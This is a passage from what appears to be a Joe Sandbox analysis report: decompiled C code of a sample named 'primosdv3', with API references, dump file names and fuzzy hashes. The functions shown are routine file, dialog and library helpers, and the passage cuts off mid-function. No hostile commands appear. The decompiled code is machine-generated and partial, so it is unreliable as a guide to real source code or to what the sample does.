Part of subcall function 00C88E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C84286,?,0000015D,?,?,?,?,00C85762,000000FF,00000000,?,?), ref: 00C88E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00CA1098,00C617CE,?,?,00000007,?,?,?,00C613D6,?,00000000), ref: 00C88EB1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 4244ab105653cfb1b519757ab64e6e822971694d32eb2baeff13dd3d8d98e299
Instruction ID: 1dff6817eb5f670dfa6f9c11ccdb17988eaacd9b636ef2dc304bb4056fe5aaa1
Opcode Fuzzy Hash: 4244ab105653cfb1b519757ab64e6e822971694d32eb2baeff13dd3d8d98e299
Instruction Fuzzy Hash: 6EF0213A20111266CB217B269C05F7F37589FC1778FE40126F82457991DF70DE0493AC

Uniqueness

Uniqueness Score: -1.00%

Function 00C7109E Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7109E(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 != 0) {
					_t14 = 0;
					_t17 = _v8;
					_t15 = 1;
					do {
						if((_t17 & _t15) != 0) {
							_t14 = _t14 + 1;
						}
						_t15 = _t15 + _t15;
					} while (_t15 != 0);
					if(_t14 >= 1) {
						return _t14;
					}
					return 1;
				} else {
					return _t8 + 1;
				}
			}

0x00c710b2
0x00c710ba
0x00c710c1
0x00c710c5
0x00c710c8
0x00c710ca
0x00c710cc
0x00c710ce
0x00c710ce
0x00c710cf
0x00c710cf
0x00c710d6
0x00000000
0x00c710d8
0x00c710db
0x00c710bc
0x00c710be
0x00c710be

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00C710AB
GetProcessAffinityMask.KERNEL32 ref: 00C710B2

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 19828f89de47dde8abbb204d2a3451dc80b8eb25bee8a7042931728537df5c76
Instruction ID: 0f283ca00be8858765cf432382697ae50afc5b7261e1d4332b57f693bd90e8f6
Opcode Fuzzy Hash: 19828f89de47dde8abbb204d2a3451dc80b8eb25bee8a7042931728537df5c76
Instruction Fuzzy Hash: 2BE0D832B10185EBCF198BB89C09AEF73DDEA44204318C176E817D3101FA34DF414760

Uniqueness

Uniqueness Score: -1.00%

Function 00C6A4ED Relevance: 3.0, APIs: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C6A4ED(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t13;
				signed int _t19;
				signed int _t20;

				E00C7EC50(0x1000);
				_t13 = SetFileAttributesW(_a4, _a8); // executed
				_t20 = _t19 & 0xffffff00 | _t13 != 0x00000000;
				if(_t13 == 0 && E00C6BB03(_a4,  &_v4100, 0x800) != 0) {
					_t20 = _t20 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t20;
			}

0x00c6a4f5
0x00c6a501
0x00c6a509
0x00c6a50e
0x00c6a53a
0x00c6a53a
0x00c6a541

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00C6A325,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A501

Part of subcall function 00C6BB03: _wcslen.LIBCMT ref: 00C6BB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C6A325,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A532

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: b4d6236b615c6beb2e549ac887c314ef93c86fd613a7d9b70ca19e442e7c7fbc
Instruction ID: fd8338f010d03cb7d810930c3f81a5a16a0b46ebd4110f6b698bb58f1e7d753c
Opcode Fuzzy Hash: b4d6236b615c6beb2e549ac887c314ef93c86fd613a7d9b70ca19e442e7c7fbc
Instruction Fuzzy Hash: 72F030322401497BDF115F61DC45FDE37ACAB04385F448051B949E5160EB71DED4EA60

Uniqueness

Uniqueness Score: -1.00%

Function 00C6A1E0 Relevance: 3.0, APIs: 2, Instructions: 27
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C6A1E0(WCHAR* _a4) {
				short _v4100;
				int _t11;
				signed int _t17;
				signed int _t18;

				E00C7EC50(0x1000);
				_t11 = DeleteFileW(_a4); // executed
				_t18 = _t17 & 0xffffff00 | _t11 != 0x00000000;
				if(_t11 == 0 && E00C6BB03(_a4,  &_v4100, 0x800) != 0) {
					_t18 = _t18 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t18;
			}

0x00c6a1e8
0x00c6a1f1
0x00c6a1f9
0x00c6a1fe
0x00c6a227
0x00c6a227
0x00c6a22e

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,00C6977F,?,?,00C695CF,?,?,?,?,?,00C92641,000000FF), ref: 00C6A1F1

Part of subcall function 00C6BB03: _wcslen.LIBCMT ref: 00C6BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00C6977F,?,?,00C695CF,?,?,?,?,?,00C92641), ref: 00C6A21F

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: e5309a56c8b5f40f07f0db6816c89260927f217f7f3505bf294052a37f49e376
Instruction ID: de0d62ba8a9c4d2879e408ab229edb2f93b23f7d7dad0a157415753170bf9b8e
Opcode Fuzzy Hash: e5309a56c8b5f40f07f0db6816c89260927f217f7f3505bf294052a37f49e376
Instruction Fuzzy Hash: 0AE0D8351402496BEB115F60DC86FDD375CAF0C3C5F484061B948E2050EB71DEC4EE54

Uniqueness

Uniqueness Score: -1.00%

Function 00C7AC7C Relevance: 3.0, APIs: 2, Instructions: 26
comCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00C7AC7C(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t8;
				void* _t13;
				void* _t16;
				intOrPtr _t19;

				 *[fs:0x0] = _t19;
				_t5 =  *0xca8438; // 0x768ac100
				 *0xc93278(_t5, _t13, _t16,  *[fs:0x0], 0xc92641, 0xffffffff);
				 *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))();
				L00C7EB32(); // executed
				_t8 =  *0xcc3178( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t8;
			}

0x00c7ac8d
0x00c7ac94
0x00c7aca5
0x00c7acab
0x00c7acb0
0x00c7acb5
0x00c7acbf
0x00c7acc8

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00C92641,000000FF), ref: 00C7ACB0
OleUninitialize.OLE32(?,?,?,?,00C92641,000000FF), ref: 00C7ACB5

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 0f4eb903d03df83f417fbcb855f6ad72e9596b3b6d702d967fb04d1db88670f3
Instruction ID: d54423402b65c66d2644e9b893b675a687eacb95521dc5004e7f4a4b049eced5
Opcode Fuzzy Hash: 0f4eb903d03df83f417fbcb855f6ad72e9596b3b6d702d967fb04d1db88670f3
Instruction Fuzzy Hash: D1E06D72604A50EFCB009B58DC0AB49FBA8FB89B20F04426AF416D37A0CB74A800CA94

Uniqueness

Uniqueness Score: -1.00%

Function 00C6A243 Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C6A243(WCHAR* _a4) {
				short _v4100;
				long _t7;
				long _t12;
				long _t13;

				E00C7EC50(0x1000);
				_t7 = GetFileAttributesW(_a4); // executed
				_t13 = _t7;
				if(_t13 == 0xffffffff && E00C6BB03(_a4,  &_v4100, 0x800) != 0) {
					_t12 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t12;
				}
				return _t13;
			}

0x00c6a24b
0x00c6a254
0x00c6a25a
0x00c6a25f
0x00c6a280
0x00c6a286
0x00c6a286
0x00c6a28c

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00C6A23A,?,00C6755C,?,?,?,?), ref: 00C6A254

Part of subcall function 00C6BB03: _wcslen.LIBCMT ref: 00C6BB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00C6A23A,?,00C6755C,?,?,?,?), ref: 00C6A280

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 320ea8068881ecedfcdf3528f82e34fb5dc81eb20c7ea5c6eb13d7c37aa252aa
Instruction ID: 8d409fac6d0d2c6295c150b76640a3fe8d1fd9cdf3db6628a7d1ab94c279a934
Opcode Fuzzy Hash: 320ea8068881ecedfcdf3528f82e34fb5dc81eb20c7ea5c6eb13d7c37aa252aa
Instruction Fuzzy Hash: 78E092365001245BCB21AB64CC49BD97B58AB083E1F044261FD58E3190D770DE84CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C7DEC2 Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7DEC2(void* __eflags, intOrPtr _a4, signed char _a16) {
				short _v5124;

				E00C7EC50(0x1400);
				E00C64092( &_v5124, 0xa00, E00C6E617((_a16 & 0x000000ff) + 0x65), _a4);
				SetDlgItemTextW( *0xca8458, 0x65,  &_v5124); // executed
				return E00C7B568() & 0xffffff00 |  *0xca8454 == 0x00000000;
			}

0x00c7deca
0x00c7deec
0x00c7df03
0x00c7df19

APIs

_swprintf.LIBCMT ref: 00C7DEEC

Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5

SetDlgItemTextW.USER32(00000065,?), ref: 00C7DF03

Part of subcall function 00C7B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7B579
Part of subcall function 00C7B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7B58A
Part of subcall function 00C7B568: IsDialogMessageW.USER32(000302C4,?), ref: 00C7B59E
Part of subcall function 00C7B568: TranslateMessage.USER32(?), ref: 00C7B5AC
Part of subcall function 00C7B568: DispatchMessageW.USER32(?), ref: 00C7B5B6

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 508b2c9006e90ab5cd6e7cc0d47ffe310d59539a5290a358a6dd009aaa500efb
Instruction ID: c1e8590c2cf23f4fa4dd6ede82390cdc0316ea14362720238b76f270433b1e64
Opcode Fuzzy Hash: 508b2c9006e90ab5cd6e7cc0d47ffe310d59539a5290a358a6dd009aaa500efb
Instruction Fuzzy Hash: A3E0D8B64003486BDF12BB64DC0AFDE3B6C5B09789F044851B205DB0F3EA78EE149761

Uniqueness

Uniqueness Score: -1.00%

Function 00C7081B Relevance: 3.0, APIs: 2, Instructions: 24
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7081B(intOrPtr _a4) {
				short _v4100;
				int _t8;
				struct HINSTANCE__* _t12;

				E00C7EC50(0x1000);
				_t8 = GetSystemDirectoryW( &_v4100, 0x800);
				_t14 = _t8;
				if(_t8 != 0) {
					E00C6BDF3(_t14,  &_v4100, _a4,  &_v4100, 0x800);
					_t12 = LoadLibraryW( &_v4100); // executed
					return _t12;
				}
				return _t8;
			}

0x00c70823
0x00c70836
0x00c7083c
0x00c7083e
0x00c7084c
0x00c70858
0x00000000
0x00c70858
0x00c70860

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C70836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00C6F2D8,Crypt32.dll,00000000,00C6F35C,?,?,00C6F33E,?,?,?), ref: 00C70858

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 8bd9e9dd4c84635c1db7ff1f26134d4ca60d5895a6d954853c348d1f056bc7d0
Instruction ID: 4d9bac4502fd5ca0d47e880f7ae8ea2b6c923567e4223027274a6d7b83988776
Opcode Fuzzy Hash: 8bd9e9dd4c84635c1db7ff1f26134d4ca60d5895a6d954853c348d1f056bc7d0
Instruction Fuzzy Hash: ADE01A76800168AADB11ABA49C49FDA7BACAF09395F0440A6B649E2044DB74DA84CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A3B9 Relevance: 3.0, APIs: 2, Instructions: 23
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00C7A3B9(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0xc94740;
				if(_a8 == 0) {
					L00C7EB1A(); // executed
				} else {
					L00C7EB20();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}

0x00c7a3bc
0x00c7a3be
0x00c7a3c0
0x00c7a3c3
0x00c7a3c6
0x00c7a3ce
0x00c7a3cf
0x00c7a3d2
0x00c7a3d8
0x00c7a3e1
0x00c7a3da
0x00c7a3da
0x00c7a3da
0x00c7a3e6
0x00c7a3ec
0x00c7a3f3

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00C7A3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00C7A3E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 76815c2fb2464be5eec183425867ceef881ebb4c7558980794144be938036fdd
Instruction ID: dae4da4cd36db8831652333103d82fe9d6374d6f2253759066fb3ba0506f4fba
Opcode Fuzzy Hash: 76815c2fb2464be5eec183425867ceef881ebb4c7558980794144be938036fdd
Instruction Fuzzy Hash: B3E0ED72504218EBCB10DF95C545A9DBBE8EB08364F10C05AA85A93211E374AE04DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C82B8C Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00C82B8C(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t7;
				void* _t9;

				_t1 = E00C83C57(__ecx, __eflags, E00C82AD0); // executed
				 *0xc9e7d0 = _t1;
				_pop(_t7);
				if(_t1 != 0xffffffff) {
					_t2 = E00C83D08(_t7, __eflags, _t1, 0xcc2060);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E00C82BBF(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00c82b91
0x00c82b96
0x00c82b9b
0x00c82b9f
0x00c82baa
0x00c82bb0
0x00c82bb1
0x00c82bb3
0x00c82bbe
0x00c82bb5
0x00c82bb5
0x00000000
0x00c82bb5
0x00c82ba1
0x00c82ba1
0x00c82ba3
0x00c82ba3

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C82BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00C82BB5

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 34a3b8b710c9a830498d36ff69c958d2e0d340a08bf90609577ad586dcf91e1b
Instruction ID: 9d64792d0858a5ab06609abecd0ea3b4fcaf83a031dae83718bad94e6671ef4b
Opcode Fuzzy Hash: 34a3b8b710c9a830498d36ff69c958d2e0d340a08bf90609577ad586dcf91e1b
Instruction Fuzzy Hash: 5BD022341663002A8C187EB0680FEB833C5AD51F7D7A067BBF833854C1EE108180B32E

Uniqueness

Uniqueness Score: -1.00%

Function 00C612F1 Relevance: 3.0, APIs: 2, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00C612F1(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}

0x00c612f8
0x00c6130d
0x00c61313

APIs

GetDlgItem.USER32(?,?), ref: 00C61306
ShowWindow.USER32(00000000), ref: 00C6130D

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 3244f0a93e340925c03ed1b40737b26d6a48b2bbb1a7ad0f588e62e5e6b1fcdd
Instruction ID: 4f7aa86dd380080fa10be5cc3485c52470d7b771f8181fc89cec97273a8d1e87
Opcode Fuzzy Hash: 3244f0a93e340925c03ed1b40737b26d6a48b2bbb1a7ad0f588e62e5e6b1fcdd
Instruction Fuzzy Hash: 04C0127225C280BECB011BB4EC09E2FBBB8EBA5312F08C908F0A5C0060C238C110DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00C61A04 Relevance: 1.8, APIs: 1, Instructions: 312
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00C61A04(intOrPtr* __ecx, void* __edx) {
				void* __esi;
				char _t101;
				signed int _t103;
				intOrPtr _t107;
				signed int _t109;
				signed int _t111;
				signed int _t113;
				signed int _t114;
				void* _t119;
				signed int _t125;
				intOrPtr _t126;
				char _t127;
				char _t137;
				intOrPtr _t142;
				signed int _t143;
				void* _t146;
				signed int _t151;
				signed int _t155;
				void* _t160;
				void* _t162;
				void* _t166;
				intOrPtr* _t167;
				signed int _t181;
				void* _t182;
				signed int _t184;
				char* _t198;
				intOrPtr _t199;
				signed int _t200;
				void* _t210;
				void* _t211;
				intOrPtr _t212;
				void* _t214;
				char* _t215;
				intOrPtr _t216;
				void* _t217;
				void* _t224;
				void* _t226;

				_t210 = __edx;
				E00C7EB78(0xc9265a, _t226);
				_t167 = __ecx;
				_t212 = 7;
				 *((char*)(__ecx + 0x6cd4)) = 0;
				 *((char*)(__ecx + 0x6cdc)) = 0;
				 *0xc93278(__ecx + 0x2210, _t212, _t211, _t217, _t166);
				if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0xc))))() != _t212) {
					L23:
					_t101 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
					return _t101;
				}
				_t220 = 0;
				 *((intOrPtr*)(__ecx + 0x6cd8)) = 0;
				_t103 = E00C61DF8(__ecx + 0x2210, _t212);
				if(_t103 == 0) {
					E00C613BA(_t226 - 0x38, 0x200000);
					 *(_t226 - 4) = 0;
					 *0xc93278();
					_t107 =  *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x14))))(); // executed
					 *((intOrPtr*)(_t226 - 0x18)) = _t107;
					 *0xc93278( *((intOrPtr*)(_t226 - 0x38)),  *((intOrPtr*)(_t226 - 0x34)) + 0xfffffff0);
					_t109 =  *( *_t167 + 0xc)();
					_t181 = _t109;
					_t220 = 0;
					 *(_t226 - 0x14) = _t181;
					__eflags = _t181;
					if(_t181 <= 0) {
						L21:
						__eflags =  *(_t167 + 0x6cd8);
						_t182 = _t226 - 0x38;
						if( *(_t167 + 0x6cd8) != 0) {
							_t38 = _t226 - 4; // executed
							 *_t38 =  *(_t226 - 4) | 0xffffffff;
							__eflags =  *_t38;
							E00C615FB(_t182); // executed
							L26:
							_t111 =  *(_t167 + 0x6cc8);
							_t234 = _t111 - 4;
							if(_t111 != 4) {
								__eflags = _t111 - 3;
								if(_t111 != 3) {
									L32:
									 *((intOrPtr*)(_t167 + 0x2218)) = _t212;
									 *((char*)(_t226 - 0xd)) = 0;
